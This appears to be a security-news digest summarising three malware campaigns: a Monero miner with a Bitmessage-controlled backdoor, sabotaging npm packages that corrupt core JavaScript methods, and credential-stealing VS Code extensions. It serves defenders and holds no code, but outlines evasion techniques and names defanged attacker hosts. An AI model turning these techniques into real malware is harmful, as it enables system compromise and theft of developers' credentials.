Monero-Linked Backdoor Malware Abuses PyBitmessage for Stealth C2
AhnLab Security Intelligence Center (ASEC) has identified a new malware campaign actively exploited in the wild that delivers a dual-threat payload: a Monero cryptocurrency miner and a backdoor component. This malware is currently being used in real-world attacks. However, attribution remains unclear, with clues pointing to possible Russian origins based on using a Russian-based file-sharing platform. The infection starts by decrypting and unpacking resources hidden in the primary executable, then deploying the miner and backdoor. The miner hijacks system resources to mine Monero; a cryptocurrency favored for its anonymity. Key files, including config[.]json and idle_maintenance[.]exe, are dropped into a temporary directory for persistent mining operations. Simultaneously, the backdoor—implemented via PowerShell—installs the PyBitmessage library and binds to local port 8442, ready to receive attacker commands. These instructions are delivered as encrypted Bitmessage packets, evading detection through standard network monitoring tools. The true sophistication of this campaign lies in its abuse of the PyBitmessage protocol, which provides end-to-end encryption and identity obfuscation. By integrating this into their malware, the attackers avoid traditional HTTP/S command-and-control channels, effectively masking the traffic within a decentralized and privacy-focused communication network. The backdoor component, bundled with modified libraries, uses PyInstaller to package the malicious logic and evade forensic analysis. This setup allows attackers to run PowerShell scripts directly from memory, avoiding disk-based indicators and complicating signature-based detection. While the exact distribution vector is not fully confirmed, the malware is suspected of spreading through cracked or bundled software, posing as legitimate applications. The risk is substantial; infected systems are exposed to full remote control, persistent crypto mining, and a communication method that blends into legitimate P2P traffic, making containment and response significantly more difficult.
Update: Malicious npm Packages Target JavaScript Ecosystem with Silent Corruption and Destructive Payloads
Socket Security researchers have identified a coordinated supply chain attack targeting JavaScript developers through weaponized npm packages, primarily affecting React, Vue[.]js, and Node[.]js frameworks. The campaign, attributed to a npm user operating under the alias “xuxingfeng” with a known Chinese email domain, has already resulted in over 6,200 downloads across eight malicious packages still active on the npm registry as of May 22, 2025. The attacker employs a strategic mix of legitimate and malicious packages to build trust, making it harder for developers to distinguish between safe and harmful code. Techniques used include typosquatting and mimicry of well-known plugins, such as “vite-plugin-react-extend” and “quill-image-downloader,” to exploit developer habits and sneak malware into projects. Once installed, these packages carry payloads that range from deleting files and crashing systems to silently corrupting data—deliberately designed to disrupt software development pipelines and production applications. One of the most sophisticated components, a package named “js-hood,” targets the very foundation of JavaScript by overriding core methods such as Array[.]prototype[.]filter, map, slice, and String[.]prototype[.]trim with corrupted logic. These overrides maintain valid syntax and return types, allowing applications to run without immediate signs of failure while injecting unpredictable behavior and random data outputs at randomized intervals. This “silent corruption” model is hazardous because it causes inconsistent errors that are nearly impossible to trace during normal debugging, undermining developer trust in the platform and potentially introducing long-term stability issues. The damage isn't always immediate, as the payload activates based on a timestamp, further complicating detection. Developers are advised to conduct immediate audits of all npm dependencies, revert to verified clean states, rotate credentials, and implement automated scanning tools capable of detecting supply chain threats. This campaign highlights a growing trend in open-source ecosystem exploitation, where trust is weaponized and subtle sabotage is used to compromise integrity from within.
Malicious VS Code Extensions Target Solidity Developers for Credential Theft on Windows
A newly discovered attack campaign exploits Visual Studio Code’s extension system to target Solidity developers on Windows, aiming to steal cryptocurrency wallet credentials and other sensitive data. Discovered by DataDog Security Labs, the attackers used three malicious extensions—solaibot, among-eth, and blankebesxstnion—which posed as developer tools offering Solidity syntax analysis and vulnerability scanning. While these extensions appeared legitimate and functioned as advertised, they concealed embedded malware designed to compromise the host system. Although only downloaded around 50 times before removal from the Marketplace, these extensions likely compromised several environments belonging to developers who often have privileged access to blockchain infrastructure and digital wallets. The campaign has been attributed to a previously identified threat group tracked as MUT-9332, which was earlier linked to a separate malware operation involving a Monero crypto-miner hidden in VS Code extensions that reached up to a million downloads. The infection mechanism is sophisticated, using a multi-stage approach focusing on stealth, persistence, and redundancy. The initial malicious code is hidden within the extension[.]js file, calls out to a command-and-control server (solidity[.]bot) and fetches a disguised PowerShell payload. This payload installs a malicious browser extension and modifies Chromium-based browser shortcuts to load the extension at startup. From there, the malware branches into several pathways to ensure execution, including dropping myau.exe, which disables Windows Defender, establishes persistence via registry keys and includes an anti-forensics mechanism that crashes the system if tampered with. In an unusual twist, the attackers use image-based payload delivery, embedding Base64-encoded malware inside image files like new_image[.]jpg hosted on the Internet Archive. These payloads aim to steal browser credentials, crypto wallet keys, and Discord tokens, exfiltrating them to attacker-controlled infrastructure at m-vn[.]ws/bird.php. The incident underscores the risks of trusted developer ecosystems and highlights the need for continuous vetting and stricter controls on extension permissions and behavior.
